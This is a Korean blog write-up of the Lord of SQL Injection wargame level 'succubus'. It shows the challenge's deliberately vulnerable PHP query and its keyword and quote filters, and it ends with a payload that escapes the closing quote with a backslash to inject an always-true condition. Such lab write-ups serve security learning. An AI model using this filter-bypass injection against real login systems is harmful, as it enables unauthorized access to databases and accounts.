Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
Tags
- 1819 (HY000):
- 우분투
- Union SQL Injection
- los.rubiya.kr
- ubuntu
- XAVIS
- sqli
- blind SQLi
- btmp
- Error Based SQL Injection
- 가상머신 os
- M2
- mocOS
- SQL i
- docker compose
- UTM
- Python requests 설치
- 2002(HY000)
- Kail Linux
- str_replace함수
- utmp
- ModuleNotFoundError: No module named ‘requests’
- Lord of SQL Injection
- MySQL
- Lord of SQLinjection
- SQLi wargame
- goblin 3번
- sql injection
- LOS 5번
- No module named ‘requests’
Archives
- Today
- Total
klaus
[Lord of SQL Injection] succubus 16번(feat. 싱글쿼터 우회) 본문
0.서큐버스
1. 전체 코드
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/\'/',$_GET[id])) exit("HeHe");
if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
$query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("succubus");
highlight_file(__FILE__);
?>
2. 중요 코드 분석
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/\'/',$_GET[id])) exit("HeHe");
if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
$query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
if($result['id']) solve("succubus");
1) ~4) 필터링(id/pw)
- prob
- _
- .
- ( )
- '
- 대소문자 구분하지 않음
6) 마지막 줄을 보면 id 값이 맞으면 solve
3. solve
이번 문제의 경우 id와 pw를 입력할 때 싱글쿼터('), 온점(.), 언더바(_)를 사용을 못하지만 id 값만 넣어주면 문제는 가볍게 풀립니다.
먼저, 싱글쿼터를 우회하려면 어떻게 해야할까?
스포주의!!
더보기
?id=\&pw=||1=1%23
'모의해킹 > Wargame' 카테고리의 다른 글
[Lord of SQL Injection] nightmare 18번 (feat. 주석 필터링 우회) (0) | 2023.01.01 |
---|---|
[Lord of SQL Injection] zombie_assassin 17번 (0) | 2022.12.29 |
[Lord of SQL Injection] assassin 15번 (0) | 2022.12.22 |
[Lord of SQL Injection] giant 14번 (feat. 공백 우회) (1) | 2022.12.21 |
[Lord of SQL Injection] bugbear 13번 (0) | 2022.12.21 |
Comments